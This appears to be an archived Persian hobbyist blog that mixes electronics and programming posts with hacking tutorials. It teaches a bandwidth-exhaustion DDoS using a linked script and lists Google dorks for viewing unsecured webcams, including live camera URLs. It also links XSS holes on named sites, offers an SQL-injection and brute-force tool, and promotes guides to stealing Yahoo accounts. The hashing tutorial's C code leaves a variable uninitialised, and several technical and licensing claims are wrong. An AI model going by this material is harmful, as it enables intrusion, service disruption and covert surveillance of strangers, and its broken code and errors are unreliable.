• MD4 (128 bits, obsolete)
• MD5 (128 bits)
• RIPEMD-160 (160 bits)
• SHA-1 (160 bits)
• SHA-256, SHA-384, and SHA-512 (longer versions of SHA-1, with slightly different designs)

انواع مختلفی از الگوریتم های قوی هش کردن برای استفاده در برنامه های کاربردی موجود هستند، محبوب ترین آنها که مورد استفاده برنامه نویسان هستند MD5 و SHA-1(Secure hash algorithm)می باشند. سیستم های قدیمی تر از( DES(Data Encryption Standard استفاده می کردند. این روش 56 بیتی دیگر یک روش قوی هش کردن محسوب نمی گردد. ، الگوریتم های قوی تری مانند SHA-256 و SHA-512 برای موارد خاص مانند امضاهای دیجیتالی توصیه می گردد ولی برای هش کردن کلمات عبوردر برنامه های امروزی SHA-1 هنوز سطح امنیت بسیار خوبی را فراهم می کند.

Hash Table
همانطور که در جستجوی دودویی دیده شد با استفاده از یک ساختمان داده به خصوص به اسم درخت جستجوی دودویی کارایی جستجو را بهبود بخشید یم.
رسیدیم. O(logn) به جستجوی دودویی با O(n) در واقع از جستجوی خطی با
حال می خواهیم یک ساختمان داده جدید به نام جدول هش را معرفی کنیم که کارایی عمل جستجو را تا افزایش می دهد.O(1)
یک جدول هش از دو قسمت تشکیل شده : یک آرایه (جدول واقعی جایی که دادهایی که جستجو می شود ) که به آن تابع هش می گویند.mapping function در آن ذخیره می شود ) و یک تابع نگاشت (
اندیس های آرایه که (integer space ) تابع هش نگاشتی است از فضای ورودی به فضای اعداد صحیح را مشخص می کند . به عبارت دیگر تابع هش روشی را فراهم می کند برای اختصاص دادن اعداد به داده های ورودی به گونه ای که سپس داده ورودی می تواند در اندیس آرایه مطابق باعدد تخصیص داده ذخیره شود.در ادامه مثالی در این رابطه بیان می کنیم:
مثال را آغاز می کنیم. یعنی از رشته ها به عنوان داده هایی ابتدا با یک آرایه جدول هش از رشته ها که ذخیره و جستجو می شوند استفاده می کنیم . اندازه جدول هش را در این مثال 12 می گیریم.

The empty hash table of strings
در مرحله بعد ما به یک تابع هش نیاز دارم. راههای زیادی برای ساختن یک تابع هش وجود دارد. در حال حاضر یک تابع هش ساده را در نظر می گیریم. که یک رشته را به عنوان ورودی میگیرد. مقدار هش برگشتی از تابع برابر مجموع کاراکتر های اسکی است که رشته ورودی را می سازند به پیمانه اندازه جدول:
int hash(char *str, int table_size)
{
int sum;

/* Make sure a valid string passed in */
if (str==NULL) return -1;

/* Sum up all the characters in the string */
for( ; *str; str++) sum += *str;

/* Return the sum mod the table size */
return sum % table_size;
}
اجرا می کنیم که مقدار 3 حاصل می شود.("Steve",12) تابع هش را باپارامتر های
. را در جدول ذخیره می کنیم Steve حال رشته

The hash table after inserting "Steve"

اجرا میکنیم("Spark",12) تابع هش را با پارامتر های ."Spark" بیایید رشته دیگری را امتحان کنیم:
که عدد 6 حاصل می شود. سپس آن را نیز در جدول ذخیره میکنیم.

The hash table after inserting "Spark"
اجرا میکنیم . که این بار نیز مقدار 3 حاصل می شود.("Notes",12) حال تابع هش را با پارامتر های
را نیز در جدول درج می کنیم. Notesرشته

A hash table collision
مشاهده می شود که دو ورودی متفاوت مقدارهش یکسانی دارند و هر دو عنصر باید در یک مکان در آرایه درج شوند که این مساله غیر ممکن است . و همانطور که قبلا نیز ذکر شد به این مساله تصادم گفته (linear probing) می شود. در رابطه با تصادم الگوریتم های زیادی وجود دارد از قبیل اکتشاف خطی و زنجیرسازی جداگانه.
بررسی می کنیم. ر ا (Separate Chaining) که ما در اینجا زنجیره سازی جداگانه
زنجیره سازی جداگانه به مقدار کمی تغییر در ساختمان دادهمان نیاز دارد. به جای ذخیره سازی مستقیم داده ها در آرایه آنها را در لیست های پیوندی ذخیره می کنیم. هر عنصر آرایه به یکی از این لیست های پیوندی اشاره می کند. زمانی که مقدار هش یک ورودی به دست آمد آن عنصر به لیست پیوندی که در اندیس مورد نظر در آرایه وجود دارد اضافه می شود . از ان جایی که لیست های پیوندی محدودیت در طولشان ندارند مساله تصادم ها حل شده به حساب می آید. اگر دو داده متفاوت مقدار هش یکسانی داشته باشند هر دوی آنها در لیست پیوندی ذخیره می شوند.
بیایید مثال بالا را این بار با ساختمان داده تغییر یافته مان بررسی نماییم :

Modified table for separate chaining

دوباره Steve را با مقدار هش 3 به جدولمان اضافه میکنیم:

After adding "Steve" to the table
هم چنین Spark با مقدار هش 6 را نیز به جدولمان اضافه می کنیم:

After adding "Spark" to the table
حال Notes با مقدار هش 3 (همانند مقدار هش Steve) را اضافه می کنیم:

Collision solved - "Notes" added to table

مراحل جستجو مشابه با عمل درج در جئول می باشد. ما مقدار هش داده ای را که می خواهیم جستجو شود را به دست می آوریم. سپس به ان مکان از آرایه می رویم. لیستی که از آن مکان سرچشمه می گیرد (آغاز میشود) را بررسی می کنیم. و می بینیم که چیزی که به دنبال آن هستیم در لیست وجود دارد یا نه .
=>تعداد مراحل O(1) می باشد.
زنجیره سازی جداگانه Separate chaining) ) به ما این امکان را می دهد که مساله تصادم را در یک روش ساده و قدرتمند حل نماییم . با این حال هنوز مشکلاتی وجود دارد . حالتی را فرض کنید که تمام داده های ورودی دارای یک مقدار هش باشند. در این مورد برای جستجوی یک داده باید یک جستجوی خطی با O(n) در لیست پیوندی انجام دهیم . پس در بدترین حالت این روش O(n) را خواهیم داشت که احتمال آن بسیار کم است . در حال که در بهترین حالت و حالت متوسط O(1) را خواهیم داشت!

لینک های بسیار مهم و تکمیلی :
دانلود مقاله هش ها که قبلا خودم نوشته بودم
دانلود نرم افزار آنالیزگر هش
آموزش چگونگی تشکیل هش ها توسط خودم
انواع هش ها با مثال (برای آشنایی و تشخیص)

Bandwidth Exhaustion Attack and Traffic Bottlenecks

نویسنده: سینا - شنبه هشتم خرداد 1389

سلام به همه شما دوستان گلم . شاید براتون سوال پیش بیاد که این عکس که برای پست انتخاب کردم چه ربطی داره ؟ در این پست میخوام یکی از روش های DDOS رو بهتون آموزش بدم . در این روش شما با خسته کردن سرور و پایان دادن به پهنای باند سایت رو برای مدت زیادی از دسترس خارج میکنید ! این عکس هم به نشانه خستگی بیش از حد میباشد !

خوب . اما این حمله چگونه انجام خواهد شد و چه کسانی می توانند این حملات را انجام دهند ؟

کسانی می توانند از اینگونه حملات استفاده کنند که از سرعت بالا و پهنای باند بسیار بالا (نامحدود) برخوردار باشند ! و یا سروری با پهنای باند خوب در اختیار داشته باشند !

حملات چگونه انجام میگیرند ؟

در این نوع حمله شما با دانلود کردن یک فایل پر حجم از سایت هدف پهنای باند سایت را تمام میکنید ! ابتدا باید به دنبال یک فایل با حجم بالا (هر چه بیشتر بهتر) بگردید ! سپس با استفاده از اسکریپتی که در اختیارتان قرار میدهم به دانلود مکرر فایل می پردازید . تا زمانی که پهنای باند به پایان برسد این فایل با سرعت بالایی دانلود خواهد شد و پهنای باند سایت را از بین میبرد !

اما اسکریپت به زبان Perl نوشته شده است و برای اجرای آن به برنامه Active perl نیاز دارید که این برنامه رو با سرچ به راحتی و رایگان میتوانید به دست آورید .

برای اجرای اسکریپت باید از طریق CMD اقدام نمایید و پس از نصب اکتیو پرل فایل خود را به راحتی اجرا نمایید

لینک دانلود اسکریپت از پرشین گیگ

با تشکر

ENCODER/

اجازه‌ نامهٔ گنو (GNU/GPL) چیست ?

نویسنده: سینا - سه شنبه چهارم خرداد 1389

فرض کنید که شما اولین برنامه مفید PHP خود را نوشته اید و قصد دارید که آن را به صورت بازمتن(Open Source) در بیاورید،تا همه بتوانند از آن بهره مند شوند. چگونه می خواهید برنامه خود را عرضه کنید؟ اگر می خواهید آن را به صورت عمومی منتشر کنید(از آنجایی که تمام نرم افزارهای نوشته شده باید از یک سری قوانین بین المللی تبعیت کنند) شما احتیاج به یک مجوز(LICENSE) دارید!

انواع مختلفی از License ها وجود دارد: اگر قصد دارید که توسط برنامه نوشته شده خود،کسب درآمد کنید، شما می توانید برنامه خود را به صورت تجاری(Commercialware) عرضه کنید.در این صورت، افراد تنها با پرداخت پول، حق استفاده از برنامه شما را دارند. راه دیگر، این است که برنامه خود را به صورت Shareware در آورید که در این روش ،شما به افراد اجازه استفاده از یک نسخه با امکانات محدود از نرم افزار خود را می دهید.اگر کسی احساس کرد که برنامه شما برای کار او مناسب است ،برای دریافت نسخه کامل نرم افزار، پول پرداخت می کند. شما، همچنین می توانید برنامه خود را به صورت رایگان(Freeware) عرضه کنید که در این صورت، افراد بدون پرداخت هزینه، می توانند از نرم افزار شما استفاده کنند.

ما با این فرض شروع می کنیم که شما قصد کسب درآمد ار برنامه خود را ندارید. شما ممکن است فکر کنید که در این صورت، گزینه مورد نظر برای شما،Freeware می باشد. اما در اشتباه هستید! با اینکه Freeware به معنای استفاده آزاد از نرم افزاراست،اما هیچ کس به جز شما اجازه تغییر در برنامه را ندارد. برای اینکه بهتر این مساله را درک کنید، فرض کنید که یک برنامه مدیریت محتوا (CMS) نوشته اید و کاربران حتی اجازه تغییر Logoی شما و قرار دادن logoی خود را ندارند.

در حدود ۱۰ سال پیش برای حل این مساله، راه حلی به نام بازمتن(Open Source) پی ریزی شد. بازمتن ،بدین معنی است که برنامه شما برای هرگونه استفاده و تغییر، کاملا آزاد است.هر کاربر با توجه به نیازهای خود قادر به اعمال تغییر در برنامه شما می باشد. برای اینکه نرم افزار خود را به صورت بازمتن عرضه کنید،برنامه شما باید مجوز GNU GPL License داشته باشد.

GNU GPL مخفف “GNU General Public License” می باشد. و خود GNU مفهومی است که توسط موسسه نرم افزار رایگان(Free Software Foundation) بیان شده است و یک مخفف بازگشتی است که معنی آن GNU Not Unix می باشد.این اصطلاح اولین بار برای مجوزدهی به اولین نرم افزار بازمتن- سیستم عامل لینوکسLinus Torvald – در سال ۱۹۹۱ مطرح شد. از آن زمان GNU ، از نرم افزارهای بازمتن،مثل اسکریپت های PHP ،پشتیبانی می کند.

هر نرم افزاری که دارای مجوز GNU GPL می باشد،به صورت رایگان برای عموم منتشر می شود و معمولا شامل فایلهای منبع(Source Files) برنامه است.هر کس می تواند به استثناء نکات ذکر شده در حق کپی ( Copyright Notices)، سایر محتوای برنامه را تغییر دهد،بنابر این ،برنامه شما هرگز دزدیده نمی شود! هر نسخه تغییر یافته برنامه، می تواند به وسیله تغییر دهنده آن به صورت جداگانه منتشر شود،با این شرط که هنوز نویسنده اولیه دارای حق کپی آن است و شخص تغییر دهنده نامش را به License برنامه اضافه می کند.( شما نمی توانید خودتان را سرزنش کنید اگر برنامه نوشته شده توسط شما به صورت یک ویروس درآید!)

همچنین،GPL، شما را مطمئن می سازد که در صورت صدمه دیدن سیستم کاربران برنامه شما و یا به وجود آمدن مشکل در برنامه، هیچ یک از کاربران، قادر به شکایت قانونی از شما نیستند! برنامه های تحتGPL به صورت”as is” هستند،یعنی هیچ تضمینی(warranty) ندارند! ریسک استفاده از نرم افزار،با خود کاربران است.

منبع : CMSTALK.IR

مشاهده وب کم ها و دور زدن لاگین !

نویسنده: سینا - شنبه یکم خرداد 1389

این هم یه سری Dork برای شما دوستان گلم . با وارد کردن این ها در گوگل میتونید به صفحاتی هدایت شوید که بدون نیاز به پسورد و Login به مشاهده دوربین خیابان ها ، مراکز دولتی ، مدارس ، موسسه ها و ... وصل شوید ! این Dork ها برای دوربین های مختلف متفاوت است !

Axis:

inurl:"view/indexFrame.shtml"

inurl:"view/index.shtml"

intitle:"Live View / - AXIS"

intitle:axis camera

intitle:"axis #Kameramodell#"

Canon:

inurl:sample/LvAppl/

JVC:

intitle:"V.Networks [Motion Picture(Java)"

EvoCam

intitle:"EvoCam" inurl:"webcam.html"

WebcamXP:

intitle:"my webcamXP server!"

MOBOTIX:

inurl:/control/userimage.html

Panasonic:

inurl:/ViewerFrame?Mode=Motion

FlexWatch:

inurl:toolam.html

inurl:viewash.html

Toshiba:

intitle:"TOSHIBA Network Camera - User Login"

Sony:

inurl:/home/homeJ.html

مطمئن هستم که لذت خواهید برد !

برای مثال ، چند تا از دوربین ها :

http://62.117.68.199:8055/ViewerFrame?Mode=Motion

http://www.cherrytreeinn.com:8080/ViewerFrame?Mode=Motion&Language=0

http://24.231.158.230:8888/ViewerFrame?Mode=Motion&Resolution=640x480&Quality=Standard&PresetOperation=Move&Language=0

موفق باشید ! با تشکر

مشکل امنیتی در سایت سناتور کاخ سفید

نویسنده: سینا - شنبه یکم خرداد 1389

بهتره این رو هم یه نگاه کوچیک بندازین

مشاهده لینک

مشکل امنیتی در سایت دانشگاه صنعتی شریف

نویسنده: سینا - شنبه یکم خرداد 1389

داشتم یکم میگشتم که به این رسیدم ! جالبه ! با فایر فاکس باز کنید بهتره !

لینک مشاهده مشکل (XSS)

نرم افزار هندونه ! | نرم افزار هک چندین کاره !

نویسنده: سینا - جمعه سی و یکم اردیبهشت 1389

با کمی وبگردی به نرم افزاری با اسم تولزا برخورد کردم ! این نرم افزار رو تیم باگ ترک نوشته بود ! من هم این نرم افزار رو ویرایش کردم و با لیست های قدرتمند تر و کارآمد تر و کمی ادیت کردن برنامه (بهبود از نظر سرعت) نرم افزار را در اختیار شما دوستانم قرار دادم ! این نرم افزار استفاده های زیادی داره که اون ها رو به صورت خلاصه در زیر درج میکنم :

Mysql Injection

MSsql Incejtion

PostgreSql Injection

Sybase SQL injection

Access & Jet SQL Injection

Oracle Sql Injection

Firebird/interbase Sql Injection

======================

LFI/READER/Load_file<> Bruter

Scan Site From Folders & Files

FTP Checker

FTP Bruter

Proxy Checker

Proxy Grabber

اسنفاده نادرست از هر یک از امکانات این برنامه بر عهده استفاده کننده خواهد بود !

باگ ترک برای هر یک از امکانات این نرم افزار یک فیلم ساخته ! برای مشاهده فیلم به ادامه مطلب مراجعه نمایید !

دانلود نسخه کامل و ویرایش شده به صورت فایل زیپ از پرشین گیگ

با تشکر

سینا/

ادامه مطلب ...

آشنایی با آی سی رگولاتور يا تثبيت كننده ولتاژ

نویسنده: سینا - جمعه سی و یکم اردیبهشت 1389

منبع تغذیه 12 به 9

به منظور تثبیت (ثابت نگه داشتن) ولتاژ مورد نظر در نقاط مختلف مدار از آي سي هاي رگولاتور استفاده مي كنيم.تثبیت به اين منظور انجام مي شود كه ما در مداري نياز به يك لتاژ ثابت، مثلا 5 ولت dc دايم ولي نوساناتي در ولتاژ ورودي به مدار ما وجود دارد كه بر عملكرد مدار تاثير مي گذارد از اين رو از آي سي رگولاتور به منظور تثبيت كننده ولتاژ استفاده مي كنيم.

آي سي هاي رگولاتور دو نوع مثبت و منفي هستند و با پيش شمارهاي 78 براي نوع مثبت و 79 براي نوع منفي شناخته مي شوند دو رقم بعد از اين عدد ها نشان دهنده ولتاژ آي سي مي باشد.

مثلا: 7805 يعني آي سي رگولاتور 5 ولت مثبت

مثلا: 7805 يعني آي سي رگولاتور 5 ولت مثبت و يا: 7905 يعني آي سي رگولاتور 5 ولت منفي

آي سي رگولاتور داراي سه پايه است . پايه وسط آن مشترك است و به زمين مدار يا منفي متصل است . پايه اول ورودي جريان و پايه سوم خروجي تثبيت شده جريان است.

نكته بسيار مهم اين موضوع است كه جريان ورودي به آي سي رگولاتور بايد بين 3 تا 8 ولت بيشتر از جريان تثبیت خروجي باشد به عنوان مثال به آي سي 7805 بايد بين 8 تا 13 ولت جريان بدهيم تا 5 ولت تثبیت شده در خروجي به ما بدهد. جريان دهي آي سي هاي رگولاتور 1 آمپر است.

برخي از رنج هاي متداول آي سي هاي رگولاتور:

تيپ مثبت:7805 – 7806 – 7808 – 7809 – 7810 – 7812 – 7815 – 7818 – 7824 -…

تيپ منفي: 7905 – 7906 – 7908 – 7912 – 7915 – 7924 - …

نمونه مدار طراحی شده با آیسی رگلاتور :

ذخیره کنید

خودتان برای کامپیوترتان ریموت کنترل بسازید ! ! !

نویسنده: سینا - جمعه سی و یکم اردیبهشت 1389

تذکر : این پروژه ۱۰۰٪ تست شده می باشد و بدون هیچ نقصی کار می کند .
در این بخش شما را با ساخت یک سخت افزار بسیار ساده ، پرکاربرد ، ارزان قیمت و جالب برای کامپیوتر آشنا میکنم که به کمک آن میتوانید کامپیوتر خانگی خود را با ریموت کنترل دستگاه های مختلف نظیر : تلویزیون ، ویدئو ، رسیور و به طور کلی هر ریموت کنترل از نوع مادون قرمز کنترل کنید.

سخت افزار ما برای ارتباط با کامپیوتر از پورت سریال استفاده میکند و از دقت و حساسیت بسیار بالایی برخوردار است از اینرو هیچگونه محدودیتی برای قرار دادن گیرنده در جلوی کیس وجود ندارد و میتوان آن را در پست کیس نیز جاسازی کرد. با توجه به اندازه ی بسیار کوچک مدار گیرنده ساخته شده ، به راحتی میتوان آن را در کاور کانکتور پورت سریال جایسازی کرد که عکس نمونه ی ساخته شده ی آن را در تصاویر خواهید دید.

ادامه مطلب ...

از امواج رادیویی و تقسیم بندی باندها و فرکانس‌ها چه می دانید ؟

نویسنده: سینا - جمعه سی و یکم اردیبهشت 1389

مقاله ای مفید در رابطه با امواج رایدویی و تقسیم بندی باند ها و فرکانس ها

امروزه و در عصر پیشرفت تکنولوژی ، کاربرد و استفاده از طیف‌های فرکانسی و امواج رادیویی در حال گسترش روزافزون است. مهم‌ترین مزیت این فناوری کاهش حجم اتصالات و وسایل رابط همچون سیم‌ها و کابل‌ها هستند که در نتیجه موجب کاهش چشم‌گیر هزینه‌ها می‌گردند. به طوری که روابط بدون سیم جایگزین مطمئن آنها می‌شوند.

ارتباطات به وسیله امواج رادیویی، برپایه قوانین فیزیک و انرژی امواج الکترومغناطیسی استوار است. بدین منظور برخی مفاهیم اولیه مربوط به این موضوع را به اجمال از نظر می‌گذرانیم.

* همه ما تاکنون عباراتی نظیر UHF, VHF, AM, FM و ... را شنیده‌ایم. فضای اطراف ما آکنده از امواج رادیویی است که در تمام جهات در حال انتشار و عبور و مرور می‌باشند. اصولا یک موج رادیویی یک موج الکترومغناطیسی می‌باشد که معمولا توسط آنتن منتشر می‌گردد. امواج رادیویی دارای فرکانس‌های مختلفی هستند، که برحسب کاربری مطابق با استانداردهایی تقسیم‌بندی شده‌اند. در آمریکا FCC کمیته ملی ارتباطات مسئولیت مدیریت و تصمیم‌گیری در مورد تخصیص طیف‌های فرکانسی و صدور مجوز و یا تعیین استانداردها را برعهده دارد.

امواج رادیویی در هوا با سرعتی نزدیک به سرعت نور انتقال می‌یابند. این امر یکی از مهم‌ترین مزایای این فناوری می‌باشد که نقش بسزایی در تسریع ارتباط به عهده دارد.

واحد اندازه ‌گیری فرکانس رادیویی hertz "هرتز" یا "سیکل بر ثانیه" است و برای فرکانس‌های بزرگ‌تر، جهت خواندن و نوشتن از عباراتی مانند khz "کیلوهرتز"، mhz "مگا هرتز" و ... استفاده می‌شود. در جدول تقسیم بندی فرکانس‌ها برحسب واحد آمده است.

برای مشاهده بقیه این مطلب به ادامه مطلب رجوع کنید

ادامه مطلب ...

معایب و مزایای میکروکنترلر های مختلف نسبت به هم

نویسنده: سینا - جمعه سی و یکم اردیبهشت 1389

همانطور که میدونید من در رباتیک و طراحی مدار نیز فعالیت می کنم ! اما جالبه این مطلب رو بدونید (اگر به رباتیک علاقه دارید)

معایب و مزایای میکروکنترلر های مختلف نسبت به هم چیست ؟

از آن جای که ۶۸۱۱ و z8۰ خیلی کمتر استفاده میشوند به معرفی سه نوع دیگر میپردازم.۱) : اول از ۸۰۵۱ شروع میکنیم .
این خانواده از میکرو کنترولر ها جزو اولین نوع میکرو کنترولر ها یی بود که رایج شده و جزو پیشکسوتان مطرح میشود . معروف ترین کامپایلر برای این نوع میکرو keil یا franklin می باشد میکرو های این خانواده به نوسان ساز نیاز مند هستند و درمقابل خانواده pic یا AVR از امکانات کمتری برخور دار می باشد معروف ترین آی سی ها این خانواده ۸۹S51 یا ۸۹C51 می باشد . ابتدا این میکروکنترلر توسط شرکت بزرگ intel ساخته شد .اما بعدا intel این امکان را به دیگر شرکت ها داد که این میکروکنترلر را تولید کنند و شرکت هایی مانند ATMEL , PHILIPS , SIEMENS , DALLAS و… به تولید این میکروکنترلر پرداختنند یکی از شرکت هایی که به صورت گسترده به تولید این تراشه پرداخت ATMEL بود که مدل های مختلف میکروکنترلر ساخت این شرکت در سرار جهان و در ایران به خوبی یافت می شود .

اما اگربخواهیم به صورت کلی سیر پیشرفت این نوع میکروکنترلر رو در نظر بگیریم اولین میکروکنترلر هایی که ساخته شد با جدیدترین میکروکنترلرهای ۸۰۵۱ که الان تولید میشود با توجه به این پیشرفت شگفت در تمام زمینه ها که صنایع دیگر در دنیا دارند پیشرفت زیادی ندارد به طور مثال AT89S5X که میکروکنترلر ۸۰۵۱ جدید ساخت ATMEL است نسبت به مدل های اولیه ۸۰۵۱ پیشرفت آنچنانی ندارد . امکانات این میکرو نسبت به AVR و PIC قابل مقایسه نیست . به صورتی که که همین مدل جدید ۸۰۵۱ تقریبا حافظه ای برابر یک صدم (۰٫۰۰۱ ) میکروکنترلر های AVR را دارد و سرعتش ۴ برابر کمتر از میکروکنترلر های PIC و ۱۲ بار کمتر از میکروکنترلر های AVR است . از لحاظ امکانات دیگر هم چنین ضعفی احساس میشود. اما برای کارهای ساده تر که پیچیدگی زیادی در آن نباشد به خاطر قیمت بسیار پایینی که این میکروکنترلر دارد بسیار مناسب است . قیمت همین مدل جدید AT89S5X حدود ۱۰۰۰ تومان است که قیمت بسیار مناسبی است.
این میکرو کنترلر از زبان اسمبلی و C پشتیبانی میکند که زبان برنامه نویسی اصلی آن اسمبلی است که واقعا نوشتن با این زبان برنامه نویسی نسبت به زبان های برنامه نویسی دیگر هم مشکل تر و هم طولانی تر است. در کل این میکروکنترلر امروزه دیگر توانای رقابت با AVR و PIC رو ندارد و امروزه رقابت اصلی بین این دو میکروکنترلر است .۲) میکروکنترلر PIC
این خانواده از نظر امکانات مانند AVR میباشد و در کل صنعتی تر است .
واقعا میکروکنترلر خیلی قوی است که بر اساس بعضی آمار ها بیشترین کاربر را به خود اختصاص داده است البته متذکر شوم که در ایران این آمار به نفع AVR است. این میکروکنترلر ساخت شرکت میکرو چیپ است که PIC رو در مدل های خیلی زیادی با امکانات مختلف برای کارهای مختلف میسازد . این میکروکنترلر با مدل های مختلفPIC16XXX و PIC12XXXX که به جای X دوم از چپ به راست حروف C ,X,E,F قرار میگره که هر کدام مفهوم خاصی داره که چون بحث ما آموزش AVR است از روی اون سریع میگزریم X های بعدی هم اعدادی هستنند که نشان دهنده مدل های مختلف هستنند .۳) میکروکنترلر AVRاین خانواده از میکرو کنترلرها تمامی امکانات ۸۰۵۱ را دارا می باشد و امکاناتی چون ADC (مبدل آنالوگ به دیجیتال) – نوسان ساز داخلی و قدرت و سرعت بیشتر – EEPROM (حافظه) از جمله مزایای این خانواده می باشد مهم ترین آی سی این خانواده Tiny و Mega است.
به میکروکنترلر AVR میرسیم که بهترین میکروکنترلر موجود در بازار است .اول از همه سرعت این میکروکنترلر بسیار بالاست و به قولی دستوراتی که بهش داده میشه در یک سیکل کلاک انجام میده در صورتی که این سیکل کلاک برای ۸۰۵۱ باید تقسیم بر۱۲شودو برای PIC باید تقسیم بر ۴ بنابراین AVR سریعترین میکروکنترلر موجود در بازار است . AVR از زبان های برنامه نویسی سطح بالا یا به اصطلاح
HIGH LEVEL LANGUAGE ) HLL ) پشتیبانی میکند که باعث تولید کدهای بیشتری میشود که در کل برنامه نوشته شده نسبت به برنامه هایی که برای ۸۰۵۱ و PIC نوشته میشود کوتاهتر است. امکانات جانبی این میکروکنترلر بسیار مناسب است و شما را از خرید بعضی لوازم جانبی مانند چیپ های آنالوگ به دیجیتال (ADC) , مقایسه گر آنالوگ و… راحت میکند . در ضمن AVR از بسیاری از استاندارد های ارتباطی مانند SPI,UART,12C,JTAG پشتیبانی میکند که به راحتی میتوان این میکروکنترلر را با میکروکنترلر دیگر یا و سایل دیگر وصل کرد و با وسایل دیگر به راحتی ارتباط برقرار کند. قیمت این میکروکنترلر هم به نسبت امکانات فراوانی که داره بسیار پایین است به طوری که یک میکروکنترلر AVR تقریبا پیشرفته رو با قیمت حول و حوش ۳ تا ۴ هزار تومان خرید .
شرکت Atmel 5 میکروکنترلر ۸ بیتی AVR جدید با توان مصرفی بسیار پایین برای استفاده در مدارات با تعداد کدهای بالا و اینترفیسینگ زیاد عرضه نموده است.
این میکروکنترلر ها با نام های ATmega640 ، ATmega1280 ، ATmega2560 ، ATmega1281، ATmega2561 عرضه شده است و دارای ۶۴ تا ۲۵۶ کیلو بایت flash و ۸ کیلو بایت RAM به صورت داخلی می باشد.
این میکروهای جدید مدارات جانبی میکروها را با توجه به مدارات داخلی خود کاهش داده است که از آن جمله می توان به وجود یک اسیلاتور RC هشت مگا هرتزی در داخل خود که باعث حذف اسیلاتور خارجی گشته است را نام برد؛ از دیگر قابلیت های جالب این میکرو مصرف بسیار پایین آن می باشد این میکرو که با ۱٫۵ ولت کار می کند در حالت power down تنها ۱۰۰ نانو آمپر مصرف می کند که باعث افزایش عمر باتری خواهد شد.
مدل ۱۰۰ پین این میکرو ها داراری ۴ کانال UART و ۱۶ عدد A/D می باشد.

آموزش هک آی دی

نویسنده: سینا - جمعه سی و یکم اردیبهشت 1389

فقط همین امروز بیشتر از 9 تا نظر به صورت خصوصی برای من ارسال شد که هک کردن آی دی یاهو رو آموزش بده ! دوستان هک کردن آی دی خیلی آسونه ! اما باید یکم مقاله بخونید ! 2 تا مقاله که بهترین مقالات هک مبتدی هستند (به نظر خودم) براتون آپلود کردم که این دو مقاله واقعا به دردتون میخوره . مقاله اول که بیشتر به هک کردن آی دی یاهو و یاهو میپردازه رو خودم نوشتم و مقاله بعدی نوشته شده توسط آقای صمدی هستش که هر دو مقاله مکمل هم دیگه هستند ! هر دو رو مطالعه کنید !

عنواین کمی از مطالبی در مقاله ی خودم نوشتم :

- تروجان ها (هر سه مدل)
- فیک پیج
- اکتیو و دی اکتیو کردن یاهو
- پرت ها و آی پی ها
- کلاینت هکینگ
و...

در مقاله آقای صمدی هم نکات جالبی آموزش داده شده است ! حتما مطالعه کنید !

دانلود مقالات :

دانلود مقاله ی خودم از مدیا فایر (کتاب هک مبتدی | نویسنده : سینا احمدی)

دانلود مقاله ی آقای صمدی از سرور مدیا فایر

--------------------------

دانلود مقاله ی خودم از سرور Easy Share

دانلود مقاله ی آقای صمدی از سرور Easy Share

-------------------------

دانلود مقاله ی سینا احمدی از سرور File Factory

دانلود مقاله ی آقای صمدی از سرور File Factory

امیدوارم به دردتون بخوره ! به خاطر اینکه راحت باشید هم روی 3 تا سرور هر دو مقاله رو آپلود کردم .

با تشکر

منتظر نظراتتون هستم

سینا احمدی/

جدیدترین کامپیوتر بیست سال قبل چه شکلی بوده است؟

نویسنده: سینا - سه شنبه بیست و هشتم اردیبهشت 1389

‏

تصور اینکه تکنولوژی طی این چند سال چقدر پیشرفت کرده کار مشکلی است. این تصویر بهترین کامپیوتری است که می توانستید حدود بیست سال قبل بخرید. آن هم با قیمت فوق العاده 8499 دلار. ضمن اینکه این قیمت شامل هزینه مانیتور و ماوس نبوده است. ‏
‏
اما این همه پول برای پردازشگر اینتل 20 مگاهرتزی و کارت گرافیک VGA با حافظه RAM برابر با 2 مگابایت! البته از افتخارات کامپیوتر مورد نظر این بوده که رم آن تا 16 مگابایت قابل ارتقا بوده است. ‏
‏
در ان زمان پردازشگر 20 مگاهرتزی اینتل آنقدر به نظر سریع می آمده که در تبلیغ از ان به عنوان سریع مثل صاعقه یاد شده. حالا فکر می کنید بیست سال دیگر تکنولوژی در کجا قرار دارد؟ و در حال خندیدن به کدام فناوری هستیم که هم اکنون برایمان خارق العاده است؟ ‏

جایی برای برنامه نویسان مستقل!

نویسنده: سینا - چهارشنبه بیست و دوم اردیبهشت 1389

صنعت و بازار نرم افزار در این چند دهه اخیر رشد شگرفی داشته است. از طرفی بازار و درخواست برای نرم افزار رشد داشته است و در واقع پول بیشتری در این حوزه به گردش درآمده است و از طرفی صنعت نرم افزار به سمتی رفته است که طراحی و توسعه نرم افزار آسان تر شود. طراحی و نوشتن برنامه ها در ویرایشگرها و محیطهای توسعه ای که کار را آسان و سریع کرده اند، فریم ورک ‌هایی شامل کتابخانه ای متنوع از کلاسهای و توابع برای انجام بسیاری از کارها که زمانی انجام آنها نیازمند تخصص و صرف وقت بود، انجین ها و کامپوننتهای آماده که کار را برای توسعه یک نرم افزار پیجیده (مانند بازیهای سه بعدی) بسیار آسان تر کرده اند، ارائه رایگان و در دسترسی بودن سورس هزاران نرم افزار جهت مطالعه برنامه نویسان که برخی از آنها مانند بازیها یا سیستم عاملها پیجیدگیهای فراوانی دارند و... عملاً توسعه نرم افزار را به کاری ساده تر تبدیل کرده اند. اما با وجود آنکه توسعه نرم افزار ساده تر و سریعتر شده رشد صنعت نرم افزار عرض اندام را برای کوچکترها سخت تر کرده است. برای مثال نگاهی به بازیهای کامپیوترهای دو دهه قبل داشته باشید با وجودیکه نوشتن چنین بازیهایی در آن زمان آسان نبوده اما بسیاری از این بازیهای توسط یک نفر یا تیمی شامل دو یا سه نفر از برنامه نویسان نوشته شده است.اما نگاهی به بازیهای کامپیوتری امروز داشته باشید و برای اطلاع بیشتر بخش معرفی توسعه دهندگان این بازیها را ببنید گاهی فهرست افرادی که در توسعه یک بازی امروزی نقش داشته اند به اندازه یک دست اندرکاران یک فیلم هالیوودی است و در کنار آن بایستی هزینه های انجین های مختلف نرم افزارهای که برخی قیمتهای چند ده میلیون دلاری دارند یا استودیوهای که برای تهیه این بازیها لازم است نیز اضافه کنید و همه اینها باعث می شود که هزینه تولید برخی بازیهای شاخص این روزها میلیون ها دلار باشد و طبیعی است که با وجود بازیهایی با چنین کیفیت و افزایش انتظار مشتریان عملا جای چندانی برای تیمهای کوچک و مستقل برنامه نویسی برای عرض اندام باقی نمی ماند. در دیگر حوزه ها نیز اوضاع به همین منوال است برای مثال در عرضه سیستمهای مالی و مدیریتی بخصوص در آمریکا و اروپا تنها چند شرکت چند میلیارد 